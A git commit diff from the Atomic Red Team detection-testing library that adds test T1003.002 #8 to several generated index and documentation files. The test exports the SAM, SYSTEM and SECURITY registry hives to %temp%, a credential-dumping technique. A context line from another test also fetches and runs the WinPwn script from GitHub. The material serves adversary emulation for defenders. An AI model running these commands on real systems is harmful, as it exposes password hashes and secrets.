Generated docs from job=generate-docs branch=master [ci skip]

2024-07-05 16:47:58 +00:00
parent 600767fcca
commit 054798feb3
12 changed files with 84 additions and 3 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1595-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1596-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -1451,6 +1451,7 @@ credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,Po
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
+credential-access,T1003.002,OS Credential Dumping: Security Account Manager,8,"Dumping of SAM, creds, and secrets(Reg Export)",21df41be-cdd8-4695-a650-c3981113aa3c,command_prompt
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,1,Azure - Search Azure AD User Attributes for Passwords,ae9b2e3e-efa1-4483-86e2-fae529ab9fb6,powershell
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
@@ -964,6 +964,7 @@ credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,Po
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
+credential-access,T1003.002,OS Credential Dumping: Security Account Manager,8,"Dumping of SAM, creds, and secrets(Reg Export)",21df41be-cdd8-4695-a650-c3981113aa3c,command_prompt
 credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -2034,6 +2034,7 @@
  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
+  - Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export) [windows]
 - [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
  - Atomic Test #1: Azure - Search Azure AD User Attributes for Passwords [azure-ad]
  - Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
@@ -1410,6 +1410,7 @@
  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
+  - Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export) [windows]
 - [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
@@ -87082,6 +87082,24 @@ credential-access:
          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
          -consoleoutput -noninteractive  "
        name: powershell
+    - name: Dumping of SAM, creds, and secrets(Reg Export)
+      auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
+      description: |
+        Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+        Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg export HKLM\sam %temp%\sam
+          reg export HKLM\system %temp%\system
+          reg export HKLM\security %temp%\security
+        cleanup_command: |
+          del %temp%\sam >nul 2> nul
+          del %temp%\system >nul 2> nul
+          del %temp%\security >nul 2> nul
+        name: command_prompt
+        elevation_required: true
  T1552.005:
    technique:
      modified: '2023-03-21T13:56:27.910Z'
@@ -71661,6 +71661,24 @@ credential-access:
          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
          -consoleoutput -noninteractive  "
        name: powershell
+    - name: Dumping of SAM, creds, and secrets(Reg Export)
+      auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
+      description: |
+        Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+        Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg export HKLM\sam %temp%\sam
+          reg export HKLM\system %temp%\system
+          reg export HKLM\security %temp%\security
+        cleanup_command: |
+          del %temp%\sam >nul 2> nul
+          del %temp%\system >nul 2> nul
+          del %temp%\security >nul 2> nul
+        name: command_prompt
+        elevation_required: true
  T1552.005:
    technique:
      modified: '2023-03-21T13:56:27.910Z'
@@ -39,6 +39,8 @@ Notes:

 - [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)

+- [Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8---dumping-of-sam-creds-and-secretsreg-export)
+

 <br/>

@@ -340,4 +342,41 @@ samfile -consoleoutput -noninteractive



+<br/>
+<br/>
+
+## Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
+Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 21df41be-cdd8-4695-a650-c3981113aa3c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg export HKLM\sam %temp%\sam
+reg export HKLM\system %temp%\system
+reg export HKLM\security %temp%\security
+```
+
+#### Cleanup Commands:
+```cmd
+del %temp%\sam >nul 2> nul
+del %temp%\system >nul 2> nul
+del %temp%\security >nul 2> nul
+```
+
+
+
+
+
 <br/>
@@ -174,6 +174,7 @@ atomic_tests:
    name: powershell

 - name: Dumping of SAM, creds, and secrets(Reg Export)
+  auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
  description: |
    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
    Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
@@ -1633,3 +1633,4 @@ fc369906-90c7-4a15-86fd-d37da624dde6
 10cf5bec-49dd-4ebf-8077-8f47e420096f
 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
 69f625ba-938f-4900-bdff-82ada3df5d9c
+21df41be-cdd8-4695-a650-c3981113aa3c